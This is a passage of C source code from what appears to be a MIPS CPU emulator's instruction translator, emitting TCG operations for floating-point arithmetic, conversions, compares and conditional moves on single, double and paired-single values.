tcg_temp_free_i32(tcg_ctx, fp0); } else { /* OPC_RSQRT1_S */ check_cp1_64bitmode(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_rsqrt1_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } } break; case OPC_MAXA_S: /* OPC_RSQRT2_S */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_MAXA_S */ TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_maxa_s(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); gen_store_fpr32(ctx, fp1, fd); tcg_temp_free_i32(tcg_ctx, fp1); tcg_temp_free_i32(tcg_ctx, fp0); } else { /* OPC_RSQRT2_S */ check_cp1_64bitmode(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_rsqrt2_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } } break; case OPC_CVT_D_S: check_cp1_registers(ctx, fd); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr32(ctx, fp32, fs); gen_helper_float_cvtd_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); tcg_temp_free_i32(tcg_ctx, fp32); gen_store_fpr64(ctx, fp64, fd); tcg_temp_free_i64(tcg_ctx, fp64); } break; case OPC_CVT_W_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_cvt_2008_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { 
gen_helper_float_cvt_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_CVT_L_S: check_cp1_64bitmode(ctx); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr32(ctx, fp32, fs); if (ctx->nan2008) { gen_helper_float_cvt_2008_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } else { gen_helper_float_cvt_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } tcg_temp_free_i32(tcg_ctx, fp32); gen_store_fpr64(ctx, fp64, fd); tcg_temp_free_i64(tcg_ctx, fp64); } break; case OPC_CVT_PS_S: check_ps(ctx); { TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i32 fp32_0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp32_1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp32_0, fs); gen_load_fpr32(ctx, fp32_1, ft); tcg_gen_concat_i32_i64(tcg_ctx, fp64, fp32_1, fp32_0); tcg_temp_free_i32(tcg_ctx, fp32_1); tcg_temp_free_i32(tcg_ctx, fp32_0); gen_store_fpr64(ctx, fp64, fd); tcg_temp_free_i64(tcg_ctx, fp64); } break; case OPC_CMP_F_S: case OPC_CMP_UN_S: case OPC_CMP_EQ_S: case OPC_CMP_UEQ_S: case OPC_CMP_OLT_S: case OPC_CMP_ULT_S: case OPC_CMP_OLE_S: case OPC_CMP_ULE_S: case OPC_CMP_SF_S: case OPC_CMP_NGLE_S: case OPC_CMP_SEQ_S: case OPC_CMP_NGL_S: case OPC_CMP_LT_S: case OPC_CMP_NGE_S: case OPC_CMP_LE_S: case OPC_CMP_NGT_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); if (ctx->opcode & (1 << 6)) { gen_cmpabs_s(ctx, func - 48, ft, fs, cc); } else { gen_cmp_s(ctx, func - 48, ft, fs, cc); } break; case OPC_ADD_D: check_cp1_registers(ctx, fs | ft | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_add_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_SUB_D: check_cp1_registers(ctx, fs | ft | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_sub_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MUL_D: check_cp1_registers(ctx, fs | ft | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_mul_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_DIV_D: check_cp1_registers(ctx, fs | ft | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_div_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_SQRT_D: check_cp1_registers(ctx, fs | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_sqrt_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_ABS_D: check_cp1_registers(ctx, fs | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); if (ctx->abs2008) { tcg_gen_andi_i64(tcg_ctx, fp0, fp0, 0x7fffffffffffffffULL); } else { gen_helper_float_abs_d(tcg_ctx, fp0, fp0); } gen_store_fpr64(ctx, fp0, fd); 
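/* * In abs2008 mode ABS is a non-arithmetic, pure sign-bit operation * (hence the mask above); the legacy helper instead goes through the * softfloat path and may signal on NaN inputs. */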
tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MOV_D: check_cp1_registers(ctx, fs | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_NEG_D: check_cp1_registers(ctx, fs | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); if (ctx->abs2008) { tcg_gen_xori_i64(tcg_ctx, fp0, fp0, 1ULL << 63); } else { gen_helper_float_chs_d(tcg_ctx, fp0, fp0); } gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_ROUND_L_D: check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_round_2008_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_round_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_TRUNC_L_D: check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_trunc_2008_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_trunc_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_CEIL_L_D: check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_ceil_2008_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_ceil_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_FLOOR_L_D: check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_floor_2008_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_floor_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_ROUND_W_D: check_cp1_registers(ctx, fs); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp64, fs); if (ctx->nan2008) { gen_helper_float_round_2008_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } else { gen_helper_float_round_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } tcg_temp_free_i64(tcg_ctx, fp64); gen_store_fpr32(ctx, fp32, fd); tcg_temp_free_i32(tcg_ctx, fp32); } break; case OPC_TRUNC_W_D: check_cp1_registers(ctx, fs); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp64, fs); if (ctx->nan2008) { gen_helper_float_trunc_2008_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } else { gen_helper_float_trunc_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } tcg_temp_free_i64(tcg_ctx, fp64); gen_store_fpr32(ctx, fp32, fd); tcg_temp_free_i32(tcg_ctx, fp32); } break; case OPC_CEIL_W_D: check_cp1_registers(ctx, fs); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp64, fs); if (ctx->nan2008) { gen_helper_float_ceil_2008_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } else { gen_helper_float_ceil_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } tcg_temp_free_i64(tcg_ctx, fp64); gen_store_fpr32(ctx, fp32, fd); tcg_temp_free_i32(tcg_ctx, fp32); } break; case OPC_FLOOR_W_D: check_cp1_registers(ctx, fs); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp64, fs); if (ctx->nan2008) { 
gen_helper_float_floor_2008_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } else { gen_helper_float_floor_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } tcg_temp_free_i64(tcg_ctx, fp64); gen_store_fpr32(ctx, fp32, fd); tcg_temp_free_i32(tcg_ctx, fp32); } break; case OPC_SEL_D: check_insn(ctx, ISA_MIPS32R6); gen_sel_d(ctx, op1, fd, ft, fs); break; case OPC_SELEQZ_D: check_insn(ctx, ISA_MIPS32R6); gen_sel_d(ctx, op1, fd, ft, fs); break; case OPC_SELNEZ_D: check_insn(ctx, ISA_MIPS32R6); gen_sel_d(ctx, op1, fd, ft, fs); break; case OPC_MOVCF_D: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_movcf_d(ctx, fs, fd, (ft >> 2) & 0x7, ft & 0x1); break; case OPC_MOVZ_D: check_insn_opc_removed(ctx, ISA_MIPS32R6); { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv_i64 fp0; if (ft != 0) { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr[ft], 0, l1); } fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); gen_set_label(tcg_ctx, l1); } break; case OPC_MOVN_D: check_insn_opc_removed(ctx, ISA_MIPS32R6); { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv_i64 fp0; if (ft != 0) { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr[ft], 0, l1); fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); gen_set_label(tcg_ctx, l1); } } break; case OPC_RECIP_D: check_cp1_registers(ctx, fs | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_recip_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_RSQRT_D: check_cp1_registers(ctx, fs | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_rsqrt_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MADDF_D: check_insn(ctx, ISA_MIPS32R6); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fd); gen_helper_float_maddf_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); tcg_temp_free_i64(tcg_ctx, fp1); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MSUBF_D: check_insn(ctx, ISA_MIPS32R6); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fd); gen_helper_float_msubf_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); tcg_temp_free_i64(tcg_ctx, fp1); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_RINT_D: check_insn(ctx, ISA_MIPS32R6); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_rint_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_CLASS_D: check_insn(ctx, ISA_MIPS32R6); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_class_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MIN_D: /* OPC_RECIP2_D */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_MIN_D */ TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); 
gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_min_d(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); gen_store_fpr64(ctx, fp1, fd); tcg_temp_free_i64(tcg_ctx, fp1); tcg_temp_free_i64(tcg_ctx, fp0); } else { /* OPC_RECIP2_D */ check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_recip2_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } } break; case OPC_MINA_D: /* OPC_RECIP1_D */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_MINA_D */ TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_mina_d(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); gen_store_fpr64(ctx, fp1, fd); tcg_temp_free_i64(tcg_ctx, fp1); tcg_temp_free_i64(tcg_ctx, fp0); } else { /* OPC_RECIP1_D */ check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_recip1_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } } break; case OPC_MAX_D: /* OPC_RSQRT1_D */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_MAX_D */ TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_max_d(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); gen_store_fpr64(ctx, fp1, fd); tcg_temp_free_i64(tcg_ctx, fp1); tcg_temp_free_i64(tcg_ctx, fp0); } else { /* OPC_RSQRT1_D */ check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_rsqrt1_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } } break; case OPC_MAXA_D: /* OPC_RSQRT2_D */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_MAXA_D */ TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_maxa_d(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); gen_store_fpr64(ctx, fp1, fd); tcg_temp_free_i64(tcg_ctx, fp1); tcg_temp_free_i64(tcg_ctx, fp0); } else { /* OPC_RSQRT2_D */ check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_rsqrt2_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } } break; case OPC_CMP_F_D: case OPC_CMP_UN_D: case OPC_CMP_EQ_D: case OPC_CMP_UEQ_D: case OPC_CMP_OLT_D: case OPC_CMP_ULT_D: case OPC_CMP_OLE_D: case OPC_CMP_ULE_D: case OPC_CMP_SF_D: case OPC_CMP_NGLE_D: case OPC_CMP_SEQ_D: case OPC_CMP_NGL_D: case OPC_CMP_LT_D: case OPC_CMP_NGE_D: case OPC_CMP_LE_D: case OPC_CMP_NGT_D: check_insn_opc_removed(ctx, ISA_MIPS32R6); if (ctx->opcode & (1 << 6)) { gen_cmpabs_d(ctx, func - 48, ft, fs, cc); } else { gen_cmp_d(ctx, func - 48, ft, fs, cc); } break; case OPC_CVT_S_D: check_cp1_registers(ctx, fs); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp64, fs); gen_helper_float_cvts_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); tcg_temp_free_i64(tcg_ctx, fp64); gen_store_fpr32(ctx, fp32, fd); tcg_temp_free_i32(tcg_ctx, fp32); } break; case OPC_CVT_W_D: 
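/* * cvt.w.d: convert a double to a 32-bit word; like the cases above, the * 2008-style helper is used when ctx->nan2008 is set. */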
check_cp1_registers(ctx, fs); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp64, fs); if (ctx->nan2008) { gen_helper_float_cvt_2008_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } else { gen_helper_float_cvt_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } tcg_temp_free_i64(tcg_ctx, fp64); gen_store_fpr32(ctx, fp32, fd); tcg_temp_free_i32(tcg_ctx, fp32); } break; case OPC_CVT_L_D: check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_cvt_2008_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_cvt_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_CVT_S_W: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_cvts_w(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_CVT_D_W: check_cp1_registers(ctx, fd); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr32(ctx, fp32, fs); gen_helper_float_cvtd_w(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); tcg_temp_free_i32(tcg_ctx, fp32); gen_store_fpr64(ctx, fp64, fd); tcg_temp_free_i64(tcg_ctx, fp64); } break; case OPC_CVT_S_L: check_cp1_64bitmode(ctx); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp64, fs); gen_helper_float_cvts_l(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); tcg_temp_free_i64(tcg_ctx, fp64); gen_store_fpr32(ctx, fp32, fd); tcg_temp_free_i32(tcg_ctx, fp32); } break; case OPC_CVT_D_L: check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_cvtd_l(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_CVT_PS_PW: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_cvtps_pw(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_ADD_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_add_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_SUB_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_sub_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MUL_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_mul_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_ABS_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_abs_ps(tcg_ctx, fp0, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MOV_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, 
fp0, fs); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_NEG_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_chs_ps(tcg_ctx, fp0, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MOVCF_PS: check_ps(ctx); gen_movcf_ps(ctx, fs, fd, (ft >> 2) & 0x7, ft & 0x1); break; case OPC_MOVZ_PS: check_ps(ctx); { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv_i64 fp0; if (ft != 0) { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr[ft], 0, l1); } fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); gen_set_label(tcg_ctx, l1); } break; case OPC_MOVN_PS: check_ps(ctx); { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv_i64 fp0; if (ft != 0) { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr[ft], 0, l1); fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); gen_set_label(tcg_ctx, l1); } } break; case OPC_ADDR_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, ft); gen_load_fpr64(ctx, fp1, fs); gen_helper_float_addr_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MULR_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, ft); gen_load_fpr64(ctx, fp1, fs); gen_helper_float_mulr_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_RECIP2_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); 